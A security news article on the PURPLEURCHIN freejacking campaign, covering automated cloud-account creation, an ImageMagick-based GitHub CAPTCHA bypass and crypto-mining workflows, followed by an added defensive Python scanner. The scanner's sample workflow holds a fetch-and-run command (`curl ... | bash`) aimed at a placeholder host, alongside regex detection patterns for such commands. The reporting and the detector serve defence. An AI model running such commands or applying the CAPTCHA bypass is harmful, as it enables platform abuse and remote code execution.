
Hackers Using CAPTCHA Bypass Tactics in Freejacking Campaign on GitHub

Jan 06, 2023 | Ravie Lakshmanan | Cryptocurrency / GitHub

Freejacking Campaign

A South Africa-based threat actor known as Automated Libra has
been observed employing CAPTCHA bypass techniques to create GitHub
accounts in a programmatic fashion as part of a freejacking
campaign dubbed PURPLEURCHIN.

The group “primarily targets cloud platforms offering
limited-time trials of cloud resources in order to perform their
crypto mining operations,” Palo Alto Networks Unit 42 researchers
William Gamazo and Nathaniel Quist said[1].

PURPLEURCHIN first came to light in October 2022 when Sysdig
disclosed[2]
that the adversary created as many as 30 GitHub accounts, 2,000
Heroku accounts, and 900 Buddy accounts to scale its operation.

Now, according to Unit 42, the cloud threat actor group created
three to five GitHub accounts every minute at the height of its
activity in November 2022, setting up a total of over 130,000 bogus
accounts across Heroku, Togglebox, and GitHub.

More than 22,000 GitHub accounts are estimated to have been
created between September and November 2022, three in September,
1,652 in October, and 20,725 in November. A total of 100,723 unique
Heroku accounts have also been identified.

The cybersecurity company also termed the abuse of cloud
resources a “play and run” tactic designed to avoid paying the
platform vendor’s bill by making use of falsified or stolen credit
cards to create premium accounts.

Its analysis of 250GB of data puts the earliest sign of the
crypto campaign at least as far back as August 2019, nearly 3.5
years ago, identifying the use of more than 40 wallets and seven
different cryptocurrencies.

The core idea that undergirds PURPLEURCHIN is the exploitation
of computational resources allocated to free and premium accounts
on cloud services in order to reap monetary profits on a massive
scale before losing access for non-payment of dues.

Besides automating the account creation process by leveraging
legitimate tools like xdotool[3] and ImageMagick[4], the threat
actor has also been found to take advantage of a weakness in the
CAPTCHA check on GitHub to further its illicit objectives.

This is accomplished by using ImageMagick’s convert command[5]
to transform the CAPTCHA images to their RGB complements, followed
by using the identify command[6]
to extract the skewness of the red channel[7]
and selecting the smallest value.

Once the account creation is successful, Automated Libra
proceeds to create a GitHub repository and deploys workflows[8]
that make it possible to launch external Bash scripts and
containers for initiating the crypto mining functions.
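
As an added example (not from the article or the Unit 42 report), a defender auditing repositories for the workflow behaviour described above could flag steps that fetch and run external scripts or start containers. The rule patterns, function names and sample workflow are assumptions constructed for illustration.

```python
import re

# Heuristics are assumptions made for this example; tune them to your own baseline.
RULES = [
    ("remote-script-piped-to-shell",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")),
    ("download-then-execute",
     re.compile(r"\b(?:curl|wget)\b.*(?:&&|;)\s*(?:(?:ba)?sh|chmod\s+\+x)\b")),
    ("container-run-in-step", re.compile(r"\bdocker\s+run\b")),
    ("container-action", re.compile(r"^\s*-?\s*uses:\s*docker://")),
]

# Constructed sample workflow; hosts and image names are placeholders.
SAMPLE = """\
name: build
on: [push]
jobs:
  work:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: |
          # curl https://example.invalid/old.sh | bash
          curl -fsSL https://example.invalid/setup.sh | bash
      - run: docker run -d example.invalid/worker:latest
      - uses: docker://example.invalid/tool:1
"""


def audit_workflow(text):
    """Return (line_no, rule, line) for every non-comment line matching a rule."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # ignore commented-out commands
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((no, rule, line.strip()))
    return findings


def triage(workflows):
    """Rank {path: text} by number of distinct rules hit; drop clean files."""
    scored = [(path, len({rule for _, rule, _ in audit_workflow(text)}))
              for path, text in workflows.items()]
    return sorted((s for s in scored if s[1]), key=lambda s: -s[1])


if __name__ == "__main__":
    for no, rule, line in audit_workflow(SAMPLE):
        print(f"line {no}: {rule}: {line}")
```

Hits are review leads rather than verdicts, since many legitimate pipelines also pull install scripts or run containers.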

The findings illustrate how the freejacking campaign can be
weaponized to maximize returns by increasing the number of accounts
that can be created per minute on these platforms.

“It is important to note that Automated Libra designs their
infrastructure to make the most use out of CD/CI tools,” the
researchers concluded.

“This is getting easier to achieve over time, as the traditional
VSPs are diversifying their service portfolios to include
cloud-related services. The availability of these cloud-related
services makes it easier for threat actors, because they don’t have
to maintain infrastructure to deploy their applications.”


References

  1. said (unit42.paloaltonetworks.com)
  2. disclosed (thehackernews.com)
  3. xdotool (www.semicomplete.com)
  4. ImageMagick (imagemagick.org)
  5. convert command (imagemagick.org)
  6. identify command (imagemagick.org)
  7. red channel (en.wikipedia.org)
  8. deploys workflows (docs.github.com)
  9. Twitter (twitter.com)
  10. LinkedIn (www.linkedin.com)
